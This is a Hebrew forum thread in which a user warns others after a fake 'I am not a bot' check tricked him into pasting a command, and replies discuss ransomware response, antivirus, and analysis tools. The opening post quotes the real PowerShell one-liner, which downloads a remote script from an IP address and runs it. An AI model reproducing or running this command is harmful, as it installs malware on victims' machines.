שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר
-
@MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
רק אל תנסו להשתמש בו!!!
אני לא לוקח אחריות.
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבוpowershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620
-
@יונימדיה לי היה גם דבר כזה באיזה אתר של תוכנות או משהו אבל בלי כל זה פשוט אימות לחצתי על כפתור ואז הופיע המסך של המשטרה וזה
קרה לי נזק????????????@אלישע-מואב-0 לא אם המסך של המשטרה היה בתוך הדפדפן
אם ראית שזה התוכנה שרצה על המחשב זה כבר משהו אחר -
@יונימדיה אם התוכנה הזדונית כבר הותקנה על המחשב היא עלולה להצפין את כל מה שיש על הדיסק
הרעיון שהציעו כאן לכבות את המחשב מיד - לא בטוח שזה רעיון טוב
אדרבה יכול להיות שמפתח ההצפנה נמצא בRAM וכל זמן שלא תכבה את המחשב יהיה אפשר לחלץ אותו משם
כדאי להתיעץ עם אנשי מקצוע
בכל אופן לכאורה אנטי וירוס לא היה עוזר כאן מכיון שאתה בעצמך הרצת קוד זדוני בPOWERSHELL. -
@יונימדיה אם התוכנה הזדונית כבר הותקנה על המחשב היא עלולה להצפין את כל מה שיש על הדיסק
הרעיון שהציעו כאן לכבות את המחשב מיד - לא בטוח שזה רעיון טוב
אדרבה יכול להיות שמפתח ההצפנה נמצא בRAM וכל זמן שלא תכבה את המחשב יהיה אפשר לחלץ אותו משם
כדאי להתיעץ עם אנשי מקצוע
בכל אופן לכאורה אנטי וירוס לא היה עוזר כאן מכיון שאתה בעצמך הרצת קוד זדוני בPOWERSHELL.@צללית לשחרר פוינטר של מפתח הצפנה מהראם זה עניין של פחות מאלפית השנייה, ועד שיעשו dump לזיכרון מזמן הוא יעלם,
ברור שעדיף לכבות את המחשב ולהציל את המידע הנשאר.אנטי וירוס היה עוזר כאן כי הסוגים המתקדמים מזהים פעילות חשודה ולא רק קבצים חשדים.
בנוסף הם חוסמים הרצת קוד בצורות כאלה.
וכפי שניתן לראות מסריקה פשוטה עד כמה אנטיוירוסים שונים עולים על הקובץ כמסוכן -
@cfopuser אז לפותח השרשור אפשר להגיד כמעט בוודאות שככל הנראה התוכן על המחשב לא יוצפן לו, אבל סביר להניח שכל סיסמא שהיתה לו אי פעם על המחשב חייבת שינוי דחוף? (זה שאלה, כן?)
אבל זה מוזר שגנב מידע יבקש כופר? אולי הסוואה? או עוד משהו על הדרך?
אגב, אתה נשמע מאוד בתחום, אולי יעניין אותך.
ואולי המלצה, להכניס איפה שהוירוס בודק את המחרוזת שמעדכנת שזו מכונה וירטואלית, זה יחסוך הרבה וירוסים, אפשר גם להתקין ג'ידרה וכאלו כלים.
ואולי המלצה, להכניס איפה שהוירוס בודק את המחרוזת שמעדכנת שזו מכונה וירטואלית, זה יחסוך הרבה וירוסים,
@עידו300 זה בודק דברים כמו מודל של bios ודברים דומים וברור שבשלב מתקדם הוא עושה בדיקות יותר מתוחכמות.
אפשר גם להתקין ג'ידרה וכאלו כלים.
ida הרבה יותר טוב מג'ידרה לקריאת אסמבלי טהור אבל בכול הנוגע לpseudo אולי לghidra יש יתרון קטן שגם הוא מתגמד לעומת כול המעלות בida
אגב, אתה נשמע מאוד בתחום, אולי יעניין אותך.
לא יודע אם מעניין, אבל בהחלט מוכר השאלות ששואלים שם...
ועוד יותר מוכרים הכותבים
תודה רבה לאשי ורד (A.I.V Dev)
-
ואולי המלצה, להכניס איפה שהוירוס בודק את המחרוזת שמעדכנת שזו מכונה וירטואלית, זה יחסוך הרבה וירוסים,
@עידו300 זה בודק דברים כמו מודל של bios ודברים דומים וברור שבשלב מתקדם הוא עושה בדיקות יותר מתוחכמות.
אפשר גם להתקין ג'ידרה וכאלו כלים.
ida הרבה יותר טוב מג'ידרה לקריאת אסמבלי טהור אבל בכול הנוגע לpseudo אולי לghidra יש יתרון קטן שגם הוא מתגמד לעומת כול המעלות בida
אגב, אתה נשמע מאוד בתחום, אולי יעניין אותך.
לא יודע אם מעניין, אבל בהחלט מוכר השאלות ששואלים שם...
ועוד יותר מוכרים הכותבים
תודה רבה לאשי ורד (A.I.V Dev)
-
ואולי המלצה, להכניס איפה שהוירוס בודק את המחרוזת שמעדכנת שזו מכונה וירטואלית, זה יחסוך הרבה וירוסים,
@עידו300 זה בודק דברים כמו מודל של bios ודברים דומים וברור שבשלב מתקדם הוא עושה בדיקות יותר מתוחכמות.
אפשר גם להתקין ג'ידרה וכאלו כלים.
ida הרבה יותר טוב מג'ידרה לקריאת אסמבלי טהור אבל בכול הנוגע לpseudo אולי לghidra יש יתרון קטן שגם הוא מתגמד לעומת כול המעלות בida
אגב, אתה נשמע מאוד בתחום, אולי יעניין אותך.
לא יודע אם מעניין, אבל בהחלט מוכר השאלות ששואלים שם...
ועוד יותר מוכרים הכותבים
תודה רבה לאשי ורד (A.I.V Dev)
-
@עידו300 https://mitmachim.top/post/1086783
זה לא בעתיד זה ככה היה בעבר וזה ממש לא ריאלי כיום.
זה אולי ריאלי לאיזה כמה בייטים בודדים לא יותר. -
@מישהו12
אם נאמר מתקינים אנשים ווינדוס פרוץ עם KMS (הפריצה בווינדוס גם משנה דברים לא לגיטימיים במערכת הפעלה?)
זה גם גרוע כמו שכתבת לגבי לא להתקין אנטי וירוס ESET פרוץ@world הפריצות המפורסמות לווינדוס נחקרו על ידי מאות ואולי אלפי אנשים ולא התפרסם שהן נוזקות
אי אפשר לקבוע על העתיד אבל בינתיים זה בסדרצריך עזרה בשחזור מידע? ייעוץ? egozkokus1@gmail.com
-
@world הפריצות המפורסמות לווינדוס נחקרו על ידי מאות ואולי אלפי אנשים ולא התפרסם שהן נוזקות
אי אפשר לקבוע על העתיד אבל בינתיים זה בסדר@מתכנת-חובב כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
@world הפריצות המפורסמות לווינדוס נחקרו על ידי מאות ואולי אלפי אנשים ולא התפרסם שהן נוזקות
ומדובר בOpenSource, לפחות בחלק מהמקרים.
הרב שלי הלכתית אוסר לפרוץ, ולכן אל תראו בדברי אמירה שאין בעיה, אבל ברמה הטכנית בלבד - אם מדובר במשהו מוכר מאוד, ותיק מאוד, וקוד פתוח - זה כנראה אמין -
@מתכנת-חובב כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
@world הפריצות המפורסמות לווינדוס נחקרו על ידי מאות ואולי אלפי אנשים ולא התפרסם שהן נוזקות
ומדובר בOpenSource, לפחות בחלק מהמקרים.
הרב שלי הלכתית אוסר לפרוץ, ולכן אל תראו בדברי אמירה שאין בעיה, אבל ברמה הטכנית בלבד - אם מדובר במשהו מוכר מאוד, ותיק מאוד, וקוד פתוח - זה כנראה אמין -
@cfopuser ונוסיף יותר מזה, שהמכשיר צריך לדעת לפענח את הביטים האלו כפקודות. לא כל מכשיר שישמיע אותם ידבק.
@מישהו12 ברור שצריך תוכנה שתשב על המחשב ותפענח... אבל אפשר לעשות כל אפליקציה לגיטימית ומטופשת או משחק ילדותי ולהוסיף להם את הפיצ'ר הזה, קצת באזז מסביב למשחק וכל מכשיר אנדרואיד יהפוך למטרה פוטנציאלית...
איפה השתמשו בזה בעבר?
היום לא צריך כ"כ הרבה זכרון בשביל ליצור וירוס, במיוחד שיש לך אפליקציה כבר על המכשיר שתכתוב אותו ישירות למכשיר... -
@מישהו12 ברור שצריך תוכנה שתשב על המחשב ותפענח... אבל אפשר לעשות כל אפליקציה לגיטימית ומטופשת או משחק ילדותי ולהוסיף להם את הפיצ'ר הזה, קצת באזז מסביב למשחק וכל מכשיר אנדרואיד יהפוך למטרה פוטנציאלית...
איפה השתמשו בזה בעבר?
היום לא צריך כ"כ הרבה זכרון בשביל ליצור וירוס, במיוחד שיש לך אפליקציה כבר על המכשיר שתכתוב אותו ישירות למכשיר...@עידו300 מה שאתה מתאר צריך לעבוד ככה
מכשיר כלשהו שיצפצף ליד המחשב במשך 3 שניות לפחות (אפשר פשוט לשלוח קישור מקוצר) ותוכנה על המחשב שתהיה פעילה ותדע להריץ את מה שיתקבל
זאת אומרת שאתה צריך לגרום למישהו להתקין על המחשב תוכנה שהוא לא מכיר - אז תעשה כבר את התוכנה עצמה וירוס וגם לצפצף לידו זאת אומרת שאתה צריך גישה פיזית כלשהי אליו
לא נשמע משהו עדיף על הוירוסים שקיימים כיום -
@מישהו12 ברור שצריך תוכנה שתשב על המחשב ותפענח... אבל אפשר לעשות כל אפליקציה לגיטימית ומטופשת או משחק ילדותי ולהוסיף להם את הפיצ'ר הזה, קצת באזז מסביב למשחק וכל מכשיר אנדרואיד יהפוך למטרה פוטנציאלית...
איפה השתמשו בזה בעבר?
היום לא צריך כ"כ הרבה זכרון בשביל ליצור וירוס, במיוחד שיש לך אפליקציה כבר על המכשיר שתכתוב אותו ישירות למכשיר...@עידו300 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
איפה השתמשו בזה בעבר?
כל האינטרנט הוא בבסיסו בנוי ככה.
@מתכנת-חובב כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
זאת אומרת שאתה צריך לגרום למישהו להתקין על המחשב תוכנה שהוא לא מכיר - אז תעשה כבר את התוכנה עצמה וירוס וגם לצפצף לידו זאת אומרת שאתה צריך גישה פיזית כלשהי אליו
הדבר היחיד הוא אם תזריק את זה כחלק מקוד לאפליקציית\תוכנת פודקאסטים או סטרימינג של מוזיקה. אבל מצד שני, אז ישמעו צפצופים מוזרים
הבלוג שלי
https://aiv-dev.com/he-IL/ -
@עידו300 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
איפה השתמשו בזה בעבר?
כל האינטרנט הוא בבסיסו בנוי ככה.
@מתכנת-חובב כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
זאת אומרת שאתה צריך לגרום למישהו להתקין על המחשב תוכנה שהוא לא מכיר - אז תעשה כבר את התוכנה עצמה וירוס וגם לצפצף לידו זאת אומרת שאתה צריך גישה פיזית כלשהי אליו
הדבר היחיד הוא אם תזריק את זה כחלק מקוד לאפליקציית\תוכנת פודקאסטים או סטרימינג של מוזיקה. אבל מצד שני, אז ישמעו צפצופים מוזרים
@מישהו12 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
הדבר היחיד הוא אם תזריק את זה כחלק מקוד לאפליקציית\תוכנת פודקאסטים או סטרימינג של מוזיקה. אבל מצד שני, אז ישמעו צפצופים מוזרים
קצת לא הבנתי איך זה יעבוד - תפיץ גרסה משלך לתוכנת פודקאסטים שיודעת להבחין אם בפודקאסט מסויים יש צלילים ולבצע את מה שמקודד בהם?
אז כבר תקודד את זה ב header של הקובץ או משהו
ואם אתה יכול להזריק את זה באפליקציה קיימת תזריק שם משהו שפותח סוקט לשרת שלך
וצפצופים מוזרים לא אמורים לשמוע כי אפשר לשלב את זה במקומות שזה ישתלב עם המוזיקה או הדובר או פשוט בתדר גבולי (אני מאמין שתדר נמוך או גבוה משמעותית מהאוזן האנושית יסונן על ידי הרמקולים אז נאמר משהו גבוליצריך עזרה בשחזור מידע? ייעוץ? egozkokus1@gmail.com
-
@מישהו12 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
הדבר היחיד הוא אם תזריק את זה כחלק מקוד לאפליקציית\תוכנת פודקאסטים או סטרימינג של מוזיקה. אבל מצד שני, אז ישמעו צפצופים מוזרים
קצת לא הבנתי איך זה יעבוד - תפיץ גרסה משלך לתוכנת פודקאסטים שיודעת להבחין אם בפודקאסט מסויים יש צלילים ולבצע את מה שמקודד בהם?
אז כבר תקודד את זה ב header של הקובץ או משהו
ואם אתה יכול להזריק את זה באפליקציה קיימת תזריק שם משהו שפותח סוקט לשרת שלך
וצפצופים מוזרים לא אמורים לשמוע כי אפשר לשלב את זה במקומות שזה ישתלב עם המוזיקה או הדובר או פשוט בתדר גבולי (אני מאמין שתדר נמוך או גבוה משמעותית מהאוזן האנושית יסונן על ידי הרמקולים אז נאמר משהו גבולי@מתכנת-חובב כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
קצת לא הבנתי איך זה יעבוד - תפיץ גרסה משלך לתוכנת פודקאסטים שיודעת להבחין אם בפודקאסט מסויים יש צלילים ולבצע את מה שמקודד בהם?
אני "רוכב" על הרעיון שלו, אני מסכים שכנראה יש דרכים טובות יותר להכניס וירוס.
מצד שני, זו תהיה דרך מאוד קשה לאיתור.
הבלוג שלי
https://aiv-dev.com/he-IL/ -
@מתכנת-חובב כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
קצת לא הבנתי איך זה יעבוד - תפיץ גרסה משלך לתוכנת פודקאסטים שיודעת להבחין אם בפודקאסט מסויים יש צלילים ולבצע את מה שמקודד בהם?
אני "רוכב" על הרעיון שלו, אני מסכים שכנראה יש דרכים טובות יותר להכניס וירוס.
מצד שני, זו תהיה דרך מאוד קשה לאיתור.
@מישהו12 אני חושב שמקטע מוצפן קצר (אחרי הכל גם השדר הזה לא יכול להיות ארוך) בקוד של התוכנה
@מישהו12 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
מצד שני, זו תהיה דרך מאוד קשה לאיתור.
דווקא לא חושב
יהיה די ברור מי הריץ את הקוד הזדוני (זה אפילו לא LOL) אז לא יהיה מורכב להבין מי התוכנה שאשמה בהדבקה ושיטות להחביא קוד קצר כבר קיימות כמו מקטע מוצפן קצר ב rsrc
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}